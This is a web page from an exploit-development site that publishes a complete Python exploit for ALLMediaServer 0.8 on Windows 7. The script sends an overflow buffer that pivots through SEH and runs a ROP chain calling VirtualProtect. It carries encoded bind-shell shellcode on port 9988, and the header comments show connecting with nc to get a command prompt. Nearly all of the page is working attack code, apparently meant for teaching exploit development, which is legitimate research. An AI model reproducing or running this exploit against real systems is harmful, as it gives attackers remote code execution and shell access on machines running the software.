FuzzySecurity | Exploits: ALLMediaServer 0.8

Home »
Exploits »
ALLMediaServer 0.8
ALLMediaServer 0.8 SEH&DEP&ASLR

#!/usr/bin/python  

#----------------------------------------------------------------------------------# 
# Exploit: ALLMediaServer 0.8 SEH&DEP&ASLR                                         # 
# Author: b33f (Ruben Boonen)                                                      # 
# OS: Win7 32-bit PRO SP1                                                          # 
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications       #
#           /442962ff59a549701f93a6fc4bf94363-ALLMediaServer.exe                   # 
#----------------------------------------------------------------------------------#
# root@bt:~/Desktop# python AllServ.py 192.168.111.129                             #
# root@bt:~/Desktop# nc -nv 192.168.111.129 9988                                   #
#  (UNKNOWN) [192.168.111.129] 9988 (?) open                                       #
#  Microsoft Windows [Version 6.1.7601]                                            #
#  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.                 #
#                                                                                  #
#  C:\Program Files\ALLMediaServer>                                                #
#----------------------------------------------------------------------------------# 

import sys, socket, struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((sys.argv[1], 888))  

#------------------------------------------------
# ROP-Chain generated by Mona!, only minor edits required
# The program is very helpful providing 250000 gadgets and no apparent badchars
#------------------------------------------------
rop = struct.pack('<L',0x6ac35756)	# POP EAX # RETN (avformat-53.dll)
rop += struct.pack('<L',0x671ee4e0)	# <- *&VirtualProtect() 
rop += struct.pack('<L',0x6ac7e1ab)	# MOV EAX,DWORD PTR DS:[EAX] # RETN (avformat-53.dll)
rop += struct.pack('<L',0x66330c98)	# XCHG EAX,ESI # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x66248004)	# POP EBP # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x660c5d07)	# ptr to 'jmp esp' (from avcodec-53.dll)
rop += struct.pack('<L',0x665a4005)	# POP EBX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x00000201)	# <- 201-hex or 513-bytes marked as executable (-> ebx)
rop += struct.pack('<L',0x665a0aa0)	# POP ECX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x6ad58001)	# RW pointer (lpOldProtect) (-> ecx)
rop += struct.pack('<L',0x6604820b)	# POP EDI # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x6604820c)	# ROP NOP (-> edi)
rop += struct.pack('<L',0x6672a1e2)	# POP EDX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x00000040)	# newProtect (0x40) (-> edx)
rop += struct.pack('<L',0x6ac35756)	# POP EAX # RETN (avformat-53.dll)
rop += struct.pack('<L',0x90909090)	# NOPS (-> eax)
rop += struct.pack('<L',0x6657f3c0)	# PUSHAD # RETN (avcodec-53.dll)

#------------------------------------------------
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -t c
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
#------------------------------------------------
shellcode = (
"\xdb\xc1\xd9\x74\x24\xf4\xbe\x70\x42\xed\x57\x5d\x29\xc9\xb1"
"\x56\x31\x75\x18\x83\xc5\x04\x03\x75\x64\xa0\x18\xab\x6c\xad"
"\xe3\x54\x6c\xce\x6a\xb1\x5d\xdc\x09\xb1\xcf\xd0\x5a\x97\xe3"
"\x9b\x0f\x0c\x70\xe9\x87\x23\x31\x44\xfe\x0a\xc2\x68\x3e\xc0"
"\x00\xea\xc2\x1b\x54\xcc\xfb\xd3\xa9\x0d\x3b\x09\x41\x5f\x94"
"\x45\xf3\x70\x91\x18\xcf\x71\x75\x17\x6f\x0a\xf0\xe8\x1b\xa0"
"\xfb\x38\xb3\xbf\xb4\xa0\xb8\x98\x64\xd0\x6d\xfb\x59\x9b\x1a"
"\xc8\x2a\x1a\xca\x00\xd2\x2c\x32\xce\xed\x80\xbf\x0e\x29\x26"
"\x5f\x65\x41\x54\xe2\x7e\x92\x26\x38\x0a\x07\x80\xcb\xac\xe3"
"\x30\x18\x2a\x67\x3e\xd5\x38\x2f\x23\xe8\xed\x5b\x5f\x61\x10"
"\x8c\xe9\x31\x37\x08\xb1\xe2\x56\x09\x1f\x45\x66\x49\xc7\x3a"
"\xc2\x01\xea\x2f\x74\x48\x63\x9c\x4b\x73\x73\x8a\xdc\x00\x41"
"\x15\x77\x8f\xe9\xde\x51\x48\x0d\xf5\x26\xc6\xf0\xf5\x56\xce"
"\x36\xa1\x06\x78\x9e\xc9\xcc\x78\x1f\x1c\x42\x29\x8f\xce\x23"
"\x99\x6f\xbe\xcb\xf3\x7f\xe1\xec\xfb\x55\x94\x2a\x32\x8d\xf5"
"\xdc\x37\x31\xde\x18\xb1\xd7\x4a\x31\x97\x40\xe2\xf3\xcc\x58"
"\x95\x0c\x27\xf5\x0e\x9b\x7f\x13\x88\xa4\x7f\x31\xbb\x09\xd7"
"\xd2\x4f\x42\xec\xc3\x50\x4f\x44\x8d\x69\x18\x1e\xe3\x38\xb8"
"\x1f\x2e\xaa\x59\x8d\xb5\x2a\x17\xae\x61\x7d\x70\x00\x78\xeb"
"\x6c\x3b\xd2\x09\x6d\xdd\x1d\x89\xaa\x1e\xa3\x10\x3e\x1a\x87"
"\x02\x86\xa3\x83\x76\x56\xf2\x5d\x20\x10\xac\x2f\x9a\xca\x03"
"\xe6\x4a\x8a\x6f\x39\x0c\x93\xa5\xcf\xf0\x22\x10\x96\x0f\x8a"
"\xf4\x1e\x68\xf6\x64\xe0\xa3\xb2\x95\xab\xe9\x93\x3d\x72\x78"
"\xa6\x23\x85\x57\xe5\x5d\x06\x5d\x96\x99\x16\x14\x93\xe6\x90"
"\xc5\xe9\x77\x75\xe9\x5e\x77\x5c")

#------------------------------------------------
# (1) Pivot through the SEH
#     0x6680c7b6 : {pivot 1100} # ADD ESP,440 # POP EBX # POP ESI # POP EDI # RETN [avcodec-53.dll]
# (2) ROP VirtualProtect()
#     Brings us 32-bytes into our A's
# (3) Shellcode (368-bytes)
#     Current executable space 513-bytes, can be set for more...
#------------------------------------------------
b00m = rop + "\x90"*10 + shellcode
buffer = "JUNK"*8 + b00m + "A"*(1044-len(b00m)) + "\xB6\xC7\x80\x66" + "X"*100
                                                                                                                         
s.send(buffer)  
s.close()